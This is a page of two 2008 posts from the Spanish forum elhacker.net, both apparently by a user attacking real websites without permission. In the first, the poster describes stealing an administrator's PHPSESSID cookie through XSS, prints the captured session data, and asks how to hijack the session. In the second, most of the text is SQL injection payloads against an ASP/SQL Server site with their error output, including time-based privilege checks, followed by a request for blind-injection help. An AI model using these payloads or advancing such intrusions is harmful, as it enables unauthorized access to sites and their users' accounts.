elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Estamos en la red social de Mastodon


  Mostrar Temas
Páginas: [1]
1  Seguridad Informática / Nivel Web / Obtuve el phpsessid con xss, y ahora ? en: 21 Marzo 2008, 01:19 am
Descubri un XSS de un sitio, robe la cookie mediante JS, hice un script en php para almacenar los datos en uno de mis servers ..

ip: 200.***.***.***

browser: Mozilla/5.0 (Windows; U; Windows NT 5.1; es-AR; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12

ref: http://www.******.com/***.php?id=*****

date: 19/03/2008

hour: 20:54:30

cookie: PHPSESSID=43p42cd42a51fe827de338042fe7d2a9

Se puede hacer algo con el PHPSESSID o nada ? estuve buscando mucho antes de postear pero no vi nadie q sepa realmente q hacer, mucha teoria y poca practica ...

El sitio no utiliza cookies ni phpsessid para los usuarios ni nada, esto cookie creo q la saque de la pc admin del site, no estoy seguro igual, ustedes diran ..

gracias
2  Seguridad Informática / Nivel Web / SQL inj en: 3 Marzo 2008, 03:28 am
Hola a ver si alguien me puede ayudar con esto  :)

Encontre una vulnerabilidad y fui siguiendo esta guia q esta en internet, pero al final sigo perdido

la SQL inj esta en id="SQL", no pongo la url xq creo q aca no se pude poner, pero si alguien la quiere se la mando x pm

##############
# Inserting a tick #
##############

id='

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


#########################
# Identify a valid page #
#########################

id=10

Returns a valid page


################################
# Insert tick after valid page #
################################

id=10'

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ',-1, 1'.

/lib/class/ListaProducto.asp, line 54


###############################
# Tried to enum db table/column name #
###############################

Attempt with the tick

id=10' having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' having 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Attempt without the tick

Returns the following error:

id=10 having 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'having'.

/lib/class/ListaProducto.asp, line 54



##################################
# Tried the AND 1=1-- and the OR 1=1-- #
##################################

Trying the AND 1=1--

id=10 AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'AND'.

/lib/class/ListaProducto.asp, line 54



Trying the OR 1=1--

id=10 or 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Sintaxis incorrecta cerca de la palabra clave 'or'.

/lib/class/ListaProducto.asp, line 54


Then tried them with the ticks

id=10' AND 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' AND 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54

id=10' OR 1=1--

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][ODBC SQL Server Driver][SQL Server]Comilla no cerrada antes de la cadena de caracteres ' OR 1=1--,-1, 1'.

/lib/class/ListaProducto.asp, line 54


Trying to determine if the DB is running as SA
id=10; if+not(select+system_user)+<>+'sa'+waitfor+delay+'0:0:5'--

Returned page immediately so we know it's NOT running as SA



Trying to determine if it is a member of the SysAdmin group
id=10; if+is_srvrolemember('sysadmin')+>+0+waitfor+delay+'0:0:5';--

Returned page immediately so we know it's NOT a member of the SysAdmin group


**

Que puedo hacer ahora, una SQL blind injection ? como se realiza ? use varios programas pero ninguno parece dar resultado, me recomendaron el SQLninja, pero no lo pude hacerlo andar, alguien me dice como se podria hacer manualmente ? o recomendarme un programa y como usarlo ?

desde ya muchas gracias ..
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines